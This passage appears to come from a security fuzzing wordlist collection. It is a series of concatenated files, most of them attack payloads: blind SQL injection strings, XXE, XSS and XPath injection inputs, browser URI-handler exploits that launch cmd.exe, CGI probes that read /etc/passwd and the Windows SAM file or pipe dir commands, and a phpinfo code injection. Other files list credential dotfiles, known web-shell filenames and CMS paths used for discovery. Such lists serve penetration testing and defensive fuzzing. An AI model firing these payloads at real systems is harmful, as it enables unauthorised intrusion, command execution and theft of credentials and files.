0=benchmark(3000000,MD5(1))%20%23 7 | " and 0=benchmark(3000000,MD5(1))%20/* 8 | " and 0=benchmark(3000000,MD5(1))%20-- 9 | " and 0=benchmark(3000000,MD5(1))%20%23 10 | ) and 0=benchmark(3000000,MD5(1))%20/* 11 | ) and 0=benchmark(3000000,MD5(1))%20-- 12 | ) and 0=benchmark(3000000,MD5(1))%20%23 13 | )) and 0=benchmark(3000000,MD5(1))%20/* 14 | )) and 0=benchmark(3000000,MD5(1))%20-- 15 | )) and 0=benchmark(3000000,MD5(1))%20%23 16 | ))) and 0=benchmark(3000000,MD5(1))%20/* 17 | ))) and 0=benchmark(3000000,MD5(1))%20-- 18 | ))) and 0=benchmark(3000000,MD5(1))%20%23 19 | )))) and 0=benchmark(3000000,MD5(1))%20/* 20 | )))) and 0=benchmark(3000000,MD5(1))%20-- 21 | )))) and 0=benchmark(3000000,MD5(1))%20%23 22 | ') and 0=benchmark(3000000,MD5(1))%20/* 23 | ') and 0=benchmark(3000000,MD5(1))%20-- 24 | ') and 0=benchmark(3000000,MD5(1))%20%23 25 | ") and 0=benchmark(3000000,MD5(1))%20/* 26 | ") and 0=benchmark(3000000,MD5(1))%20-- 27 | ") and 0=benchmark(3000000,MD5(1))%20%23 28 | ')) and 0=benchmark(3000000,MD5(1))%20/* 29 | ')) and 0=benchmark(3000000,MD5(1))%20-- 30 | ')) and 0=benchmark(3000000,MD5(1))%20%23 31 | ")) and 0=benchmark(3000000,MD5(1))%20/* 32 | ")) and 0=benchmark(3000000,MD5(1))%20-- 33 | ")) and 0=benchmark(3000000,MD5(1))%20%23 34 | '))) and 0=benchmark(3000000,MD5(1))%20/* 35 | '))) and 0=benchmark(3000000,MD5(1))%20-- 36 | '))) and 0=benchmark(3000000,MD5(1))%20%23 37 | "))) and 0=benchmark(3000000,MD5(1))%20/* 38 | "))) and 0=benchmark(3000000,MD5(1))%20-- 39 | "))) and 0=benchmark(3000000,MD5(1))%20%23 40 | ')))) and 0=benchmark(3000000,MD5(1))%20/* 41 | ')))) and 0=benchmark(3000000,MD5(1))%20-- 42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23 43 | ")))) and 0=benchmark(3000000,MD5(1))%20/* 44 | ")))) and 0=benchmark(3000000,MD5(1))%20-- 45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23 -------------------------------------------------------------------------------- /wordlist/attack/string-expansion/shell-expansion.txt: 
-------------------------------------------------------------------------------- 1 | $HOME 2 | $ENV{'HOME'} 3 | %d 4 | %s 5 | {0} 6 | %*.*s 7 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/corrupted.txt: -------------------------------------------------------------------------------- 1 | Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ 2 | ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ 3 | ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ 4 | ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ 5 | Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ 6 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/emoji.txt: -------------------------------------------------------------------------------- 1 | 2 | 😍 3 | 👩🏽 4 | 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 5 | 🐵 🙈 🙉 🙊 6 | ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 7 | ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 8 | 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 9 | 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 10 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/japanese-emoticon.txt: -------------------------------------------------------------------------------- 1 | ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ 2 | (。◕ ∀ ◕。) 3 | `ィ(´∀`∩ 4 | __ロ(,_,*) 5 | ・( ̄∀ ̄)・:*: 6 | ゚・✿ヾ╲(。◕‿◕。)╱✿・゚ 7 | ,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’ 8 | (╯°□°)╯︵ ┻━┻) 9 | (ノಥ益ಥ)ノ ┻━┻ 10 | ┬─┬ノ( º _ ºノ) 11 | ( ͡° ͜ʖ ͡°) 12 | -------------------------------------------------------------------------------- 
/wordlist/attack/unicode/naughty-unicode.txt: -------------------------------------------------------------------------------- 1 | Ω≈ç√∫˜µ≤≥÷ 2 | åß∂ƒ©˙∆˚¬…æ 3 | œ∑´®†¥¨ˆøπ“‘ 4 | ¡™£¢∞§¶•ªº–≠ 5 | ¸˛Ç◊ı˜Â¯˘¿ 6 | ÅÍÎÏ˝ÓÔÒÚÆ☃ 7 | Œ„´‰ˇÁ¨ˆØ∏”’ 8 | `⁄€‹›fifl‡°·‚—± 9 | ⅛⅜⅝⅞ 10 | ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя 11 | ٠١٢٣٤٥٦٧٨٩ 12 | 13 | 14 | 15 | 16 | 17 | ⁰⁴⁵ 18 | ₀₁₂ 19 | ⁰⁴⁵₀₁₂ 20 | ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ 21 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/regionalindicators.txt: -------------------------------------------------------------------------------- 1 | 🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸 2 | 🇺🇸🇷🇺🇸🇦🇫🇦🇲 3 | 🇺🇸🇷🇺🇸🇦 4 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/right-to-left.txt: -------------------------------------------------------------------------------- 1 | ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. 2 | בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ 3 | הָיְתָהtestالصفحات التّحول 4 | ﷽ 5 | ﷺ 6 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/specialchars.txt: -------------------------------------------------------------------------------- 1 | , 2 | . 3 | / 4 | ; 5 | ' 6 | [ 7 | ] 8 | \ 9 | - 10 | = 11 | < 12 | > 13 | ? 14 | : 15 | " 16 | { 17 | } 18 | | 19 | _ 20 | + 21 | ! 
22 | @ 23 | # 24 | $ 25 | % 26 | ^ 27 | & 28 | * 29 | ( 30 | ) 31 | ` 32 | ~ 33 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/two-byte-chars.txt: -------------------------------------------------------------------------------- 1 | 田中さんにあげて下さい 2 | パーティーへ行かないか 3 | 和製漢語 4 | 部落格 5 | 사회과학원 어학연구소 6 | 찦차를 타고 온 펲시맨과 쑛다리 똠방각하 7 | 社會科學院語學研究所 8 | 울란바토르 9 | 𠜎𠜱𠝹𠱓𠱸𠲖𠳏 10 | -------------------------------------------------------------------------------- /wordlist/attack/unicode/upsidedown.txt: -------------------------------------------------------------------------------- 1 | ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ 2 | 00˙Ɩ$- 3 | -------------------------------------------------------------------------------- /wordlist/attack/xml/xml-attacks.txt: -------------------------------------------------------------------------------- 1 | - 2 | ' or ''=' 3 | ' or '1'='1 4 | "]>&xxe;" 5 | "]>&xxe;" 6 | "]>&xxe;" 7 | "]>&xxe;" 8 | "" 9 | "SCRIPT]]>alert('XSS');/SCRIPT]]>" 10 | "XSS" 11 | "XSS" 12 | "cript:alert('XSS')"">" 13 | "]]>" 14 | "" 15 | $ 16 | % 17 | 'XoiZR 18 | <% Tnn96 %> 19 | <%= Tnn96 %> 20 | <? 
Tnn96 ?> 21 | <?Tnn96 ?> 22 | <Tnn96> 23 | "XoiZR 24 | (Tnn96) 25 | * 26 | */* 27 | / 28 | // 29 | //* 30 | : 31 | ; 32 | @ 33 | @* 34 | [Tnn96] 35 | ]> 36 | {{= Tnn96}} 37 | {{Tnn96}} 38 | {= Tnn96} 39 | {Tnn96} 40 | + 41 | SCRIPT]]>alert('XSS');/SCRIPT]]> 42 | var n=0;while(true){n++;}]]> 43 | 44 | 45 | ]>&xee; 46 | ]>&xee; 47 | ]>&xee; 48 | ]>&xee; 49 | 50 | SCRIPT]]>alert('gotcha');/SCRIPT]]> 51 | ','')); phpinfo(); exit;/* 52 | 0 53 | 0.00005 54 | 0.1 55 | 0.9 56 | 1 57 | -1 58 | 1.7976931348623157e+308 59 | 5e-10 60 | 5e-324 61 | count(/child::node()) 62 | false 63 | null 64 | true 65 | x' or 1=1 or 'x'='y 66 | x' or name()='username' or 'x'='y 67 | -------------------------------------------------------------------------------- /wordlist/attack/xpath/xpath-injection.txt: -------------------------------------------------------------------------------- 1 | ' or '1'='1 2 | ' or ''=' 3 | x' or 1=1 or 'x'='y 4 | / 5 | // 6 | //* 7 | */* 8 | @* 9 | count(/child::node()) 10 | x' or name()='username' or 'x'='y 11 | ' and count(/*)=1 and '1'='1 12 | ' and count(/@*)=1 and '1'='1 13 | ' and count(/comment())=1 and '1'='1 -------------------------------------------------------------------------------- /wordlist/attack/xss/all-encodings-of-lt.txt: -------------------------------------------------------------------------------- 1 | < 2 | %3C 3 | < 4 | < 5 | < 6 | < 7 | < 8 | < 9 | < 10 | < 11 | < 12 | < 13 | < 14 | < 15 | < 16 | < 17 | < 18 | < 19 | < 20 | < 21 | < 22 | < 23 | < 24 | < 25 | < 26 | < 27 | < 28 | < 29 | < 30 | < 31 | < 32 | < 33 | < 34 | < 35 | < 36 | < 37 | < 38 | < 39 | < 40 | < 41 | < 42 | < 43 | < 44 | < 45 | < 46 | < 47 | < 48 | < 49 | < 50 | < 51 | < 52 | < 53 | < 54 | < 55 | < 56 | < 57 | < 58 | < 59 | < 60 | < 61 | < 62 | < 63 | < 64 | < 65 | < 66 | < 67 | \x3c 68 | \x3C 69 | \u003c 70 | \u003C 71 | -------------------------------------------------------------------------------- /wordlist/attack/xss/default-javascript-event-attributes.txt: 
-------------------------------------------------------------------------------- 1 | onAbort 2 | onBlur 3 | onChange 4 | onClick 5 | onDblClick 6 | onDragDrop 7 | onError 8 | onFocus 9 | onKeyDown 10 | onKeyPress 11 | onKeyUp 12 | onLoad 13 | onMouseDown 14 | onMouseMove 15 | onMouseOut 16 | onMouseOver 17 | onMouseUp 18 | onMove 19 | onReset 20 | onResize 21 | onSelect 22 | onSubmit 23 | -------------------------------------------------------------------------------- /wordlist/attack/xss/test.xxe: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /wordlist/attack/xss/xss-uri.txt: -------------------------------------------------------------------------------- 1 | aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" 2 | firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" 3 | navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) 4 | res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 5 | firefoxurl:test" -chrome 
"javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) 6 | navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) 7 | -------------------------------------------------------------------------------- /wordlist/discovery/UserAgent/UserAgentListCommon.txt: -------------------------------------------------------------------------------- 1 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 2 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) 3 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) 4 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) 5 | Opera/9.20 (Windows NT 6.0; U; en) 6 | Opera/9.00 (Windows NT 5.1; U; en) 7 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50 8 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20060127 Netscape/8.1 9 | Googlebot/2.1 ( http://www.googlebot.com/bot.html) 10 | Googlebot-Image/1.0 ( http://www.googlebot.com/bot.html) 11 | Mozilla/2.0 (compatible; Ask Jeeves) 12 | msnbot-Products/1.0 (+http://search.msn.com/msnbot.htm) 13 | Mozilla/5.0 (iPad; U; CPU OS 
3_2_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B500 Safari/531.21.10 14 | Mozilla/5.0 (iPad; CPU OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B329 Safari/8536.25 15 | Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko 16 | Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko 17 | Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 18 | Mozilla/5.0 (Linux; U; Android 2.2.1; en-ca; LG-P505R Build/FRG83) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 19 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 20 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) 21 | Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 -------------------------------------------------------------------------------- /wordlist/discovery/dns/CcTLD.txt: -------------------------------------------------------------------------------- 1 | ac 2 | ad 3 | ae 4 | af 5 | ag 6 | ai 7 | al 8 | am 9 | an 10 | ao 11 | aq 12 | ar 13 | as 14 | at 15 | au 16 | aw 17 | ax 18 | az 19 | ba 20 | bb 21 | bd 22 | be 23 | bf 24 | bg 25 | bh 26 | bi 27 | bj 28 | bl 29 | bm 30 | bn 31 | bo 32 | bq 33 | br 34 | bs 35 | bt 36 | bv 37 | bw 38 | by 39 | bz 40 | ca 41 | cc 42 | cd 43 | cf 44 | cg 45 | ch 46 | ci 47 | ck 48 | cl 49 | cm 50 | cn 51 | co 52 | cr 53 | cu 54 | cv 55 | cw 56 | cx 57 | cy 58 | cz 59 | dd 60 | de 61 | dj 62 | dk 63 | dm 64 | do 65 | dz 66 | ec 67 | ee 68 | eg 69 | eh 70 | er 71 | es 72 | et 73 | eu 74 | fi 75 | fj 76 | fk 77 | fm 78 | fo 79 | fr 80 | ga 81 | gb 82 | gd 83 | ge 84 | gf 85 | gg 86 | gh 87 | gi 88 | gl 89 | gm 90 | gn 91 | gp 92 | gq 93 | gr 94 | gs 95 | gt 96 | gu 97 | gw 98 | gy 99 | hk 100 | hm 101 | hn 102 | hr 103 | ht 104 | hu 105 | id 106 | ie 107 | il 108 | im 109 | in 110 | 
io 111 | iq 112 | ir 113 | is 114 | it 115 | je 116 | jm 117 | jo 118 | jp 119 | ke 120 | kg 121 | kh 122 | ki 123 | km 124 | kn 125 | kp 126 | kr 127 | kw 128 | ky 129 | kz 130 | la 131 | lb 132 | lc 133 | li 134 | lk 135 | lr 136 | ls 137 | lt 138 | lu 139 | lv 140 | ly 141 | ma 142 | mc 143 | md 144 | me 145 | mf 146 | mg 147 | mh 148 | mk 149 | ml 150 | mm 151 | mn 152 | mo 153 | mp 154 | mq 155 | mr 156 | ms 157 | mt 158 | mu 159 | mv 160 | mw 161 | mx 162 | my 163 | mz 164 | na 165 | nc 166 | ne 167 | nf 168 | ng 169 | ni 170 | nl 171 | no 172 | np 173 | nr 174 | nu 175 | nz 176 | om 177 | pa 178 | pe 179 | pf 180 | pg 181 | ph 182 | pk 183 | pl 184 | pm 185 | pn 186 | pr 187 | ps 188 | pt 189 | pw 190 | py 191 | qa 192 | re 193 | ro 194 | rs 195 | ru 196 | rw 197 | sa 198 | sb 199 | sc 200 | sd 201 | se 202 | sg 203 | sh 204 | si 205 | sj 206 | sk 207 | sl 208 | sm 209 | sn 210 | so 211 | sr 212 | ss 213 | st 214 | su 215 | sv 216 | sx 217 | sy 218 | sz 219 | tc 220 | td 221 | tf 222 | tg 223 | th 224 | tj 225 | tk 226 | tl 227 | tm 228 | tn 229 | to 230 | tp 231 | tr 232 | tt 233 | tv 234 | tw 235 | tz 236 | ua 237 | ug 238 | uk 239 | um 240 | us 241 | uy 242 | uz 243 | va 244 | vc 245 | ve 246 | vg 247 | vi 248 | vn 249 | vu 250 | wf 251 | ws 252 | ye 253 | yt 254 | yu 255 | za 256 | zm 257 | zw 258 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/Randomfiles.txt: -------------------------------------------------------------------------------- 1 | /accounts.txt 2 | /culeadora.txt 3 | /data.txt 4 | /database.txt 5 | /grabbed.html 6 | /info.txt 7 | /l0gs.txt 8 | /log.txt 9 | /logins.txt 10 | /logs.txt 11 | /members.txt 12 | /pass.txt 13 | /passes.txt 14 | /password.html 15 | /password.txt 16 | /passwords.html 17 | /passwords.txt 18 | /pazz.txt 19 | /pazzezs.txt 20 | /pw.txt 21 | /pws.txt 22 | /technico.txt 23 | /usernames.txt 24 | /users.txt 25 | 
-------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/UnixDotfiles.txt: -------------------------------------------------------------------------------- 1 | /.DS_Store 2 | /.FBCIndex 3 | /.access 4 | /.addressbook 5 | /.bash_history 6 | /.bashrc 7 | /.cobalt 8 | /.cobalt/alert/service.cgi?service= 9 | /.cobalt/alert/service.cgi?service= 10 | /.cobalt/sysManage/../admin/.htaccess 11 | /.fhp 12 | /.forward 13 | /.history 14 | /.htaccess 15 | /.htaccess.old 16 | /.htaccess.save 17 | /.htaccess~ 18 | /.htpasswd 19 | /.lynx_cookies 20 | /.mysql_history 21 | /.nsconfig 22 | /.nsf/../winnt/win.ini 23 | /.passwd 24 | /.perf 25 | /.pinerc 26 | /.plan 27 | /.proclog 28 | /.procmailrc 29 | /.profile 30 | /.psql_history 31 | /.rhosts 32 | /.sh_history 33 | /.ssh 34 | /.ssh/authorized_keys 35 | /.ssh/known_hosts 36 | /.www_acl 37 | /.wwwacl 38 | /.access 39 | /.cobalt 40 | /.cobalt/alert/service.cgi?service= 41 | /.cobalt/alert/service.cgi?service= 42 | /.fhp 43 | /.htaccess 44 | /.htaccess.old 45 | /.htaccess.save 46 | /.htaccess~ 47 | /.htpasswd 48 | /.nsconfig 49 | /.passwd 50 | /.www_acl 51 | /.wwwacl 52 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/backdoors/ASP_CommonBackdoors.txt: -------------------------------------------------------------------------------- 1 | 3fexe.asp 2 | ASpy.asp 3 | EFSO.asp 4 | RemExp.asp 5 | aspxSH.asp 6 | aspxshell.aspx 7 | aspydrv.asp 8 | cmd.asp 9 | cmd.aspx 10 | cmdexec.aspx 11 | elmaliseker.asp 12 | filesystembrowser.aspx 13 | fileupload.aspx 14 | ntdaddy.asp 15 | spexec.aspx 16 | sql.aspx 17 | tool.asp 18 | tool.aspx 19 | toolaspshell.asp 20 | up.asp 21 | up.aspx 22 | zehir.asp 23 | zehir.aspx 24 | zehir4.asp 25 | zehir4.aspx 26 | cmd-asp-5.1.asp 27 | cmdasp.asp 28 | cmdasp.aspx 29 | list.asp 30 | -------------------------------------------------------------------------------- 
/wordlist/discovery/predictable-filepaths/cgi/CGI_HTTP_POST.txt: -------------------------------------------------------------------------------- 1 | post-query 2 | Config1.htm 3 | My_eGallery/public/displayCategory.php 4 | servlet/custMsg?guestName= 19 | /athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[[' 20 | /mkilog.exe 21 | /mkplog.exe 22 | /MsmMask.exe?mask=/junk334 23 | /MsmMask.exe?mask=/junk334 24 | /MsmMask.exe?mask=/junk334 25 | /MsmMask.exe?mask=/junk334 26 | /MsmMask.exe?mask=/junk334 27 | /perl.exe?-v 28 | /perl.exe 29 | /ppdscgi.exe 30 | /c32web.exe/ChangeAdminPassword 31 | /windmail.exe 32 | /dbmlparser.exe 33 | /cgimail.exe 34 | /minimal.exe 35 | /rguest.exe 36 | /visitor.exe 37 | /webbbs.exe 38 | /wguest.exe 39 | //_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15 40 | /cfgwiz.exe 41 | /Cgitest.exe 42 | /mailform.exe 43 | /post16.exe 44 | /imagemap.exe 45 | /htimage.exe/path/filename?2,2 46 | /htimage.exe 47 | /Webnews.exe 48 | /texis.exe/junk 49 | /apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/ 50 | /sensepost.exe?/c+dir 51 | /testcgi.exe 52 | /testcgi.exe? 53 | /ion-p.exe?page=c:\winnt\repair\sam 54 | /../../../../../../../../../../WINNT/system32/ipconfig.exe 55 | /NUL/../../../../../../../../../WINNT/system32/ipconfig.exe 56 | /PRN/../../../../../../../../../WINNT/system32/ipconfig.exe 57 | /c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf 58 | /foxweb.dll 59 | /wconsole.dll 60 | /shtml.dll 61 | /scripts/slxweb.dll/getfile?type=Library&file=[invalid 62 | /filename] 63 | /rightfax/fuwww.dll/? 
64 | /WINDMAIL.EXE?%20-n%20c:\boot.ini% 65 | /WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\ 66 | /GW5/GWWEB.EXE 67 | /GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA 68 | /GW5/GWWEB.EXE?HELP=bad-request 69 | /GWWEB.EXE?HELP=bad-request 70 | /echo.bat 71 | /echo.bat?&dir+c:\\ 72 | /hello.bat?&dir+c:\\ 73 | /input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ 74 | /input2.bat?|dir 75 | /input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ 76 | /test-cgi.bat 77 | /test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ 78 | /tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\, 79 | /_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X 80 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/cms/joomla_themes.txt: -------------------------------------------------------------------------------- 1 | templates/abc/ 2 | templates/atomic/ 3 | templates/b59-tpl8/ 4 | templates/beez/ 5 | templates/carbon_07/ 6 | templates/crub/ 7 | templates/dm_arrow_red/ 8 | templates/gk_eshoptrix_2/ 9 | templates/gk_gomuproject/ 10 | templates/gk_icki_sports/ 11 | templates/gk_musictop/ 12 | templates/ja_purity/ 13 | templates/ja_rochea/ 14 | templates/ja_teline_ii/ 15 | templates/joomlaport_metro/ 16 | templates/js_relevant/ 17 | templates/mynxx_j15/ 18 | templates/planets/ 19 | templates/planetsv2/ 20 | templates/rhuk_milkyway/ 21 | templates/rt_hivemind_j15/ 22 | templates/rt_mediamogul_essentials_j15/ 23 | templates/rt_nexus_j15/ 24 | templates/siteground99/ 25 | templates/siteground-j15-14/ 26 | templates/siteground-j15-68/ 27 | templates/siteground-j15-86/ 28 | templates/system/ 29 | templates/yoo_phoenix/ 30 | templates/yoo_waybeyond/ 31 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/cms/wp_common_theme_files.txt: 
-------------------------------------------------------------------------------- 1 | 404.php 2 | archive.php 3 | archives.php 4 | author.php 5 | category.php 6 | comments.php 7 | content.php 8 | data.php 9 | footer.php 10 | functions.php 11 | header.php 12 | home.php 13 | image.php 14 | images 15 | images/content-bg.jpg 16 | images/footer.jpg 17 | images/footer.png 18 | images/functions.php 19 | images/gravatar.png 20 | images/header-bg.jpg 21 | images/header.png 22 | images/index.php 23 | images/main_bg.png 24 | images/rss.png 25 | images/Thumbs.db 26 | index.php 27 | js 28 | js/html5.js 29 | languages 30 | license.txt 31 | License.txt 32 | links.php 33 | page.php 34 | print.css 35 | readme.txt 36 | reset.css 37 | rtl.css 38 | RTL.css 39 | searchform.php 40 | search.php 41 | sidebar.php 42 | single.php 43 | style.css 44 | tag.php 45 | tags.php 46 | 47 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/cms/wp_themes.readme: -------------------------------------------------------------------------------- 1 | Themes usually live in a directory called wp-content. 2 | 3 | To tell which themes are installed, first determine how the server responds to a directory that isn't present versus a file that isn't present inside a path that does exist. 4 | 5 | Use wp_common_theme_files.fuzz.php inside the identified theme directories. 6 | 7 | Often you can tell the current theme by viewing the page source. 
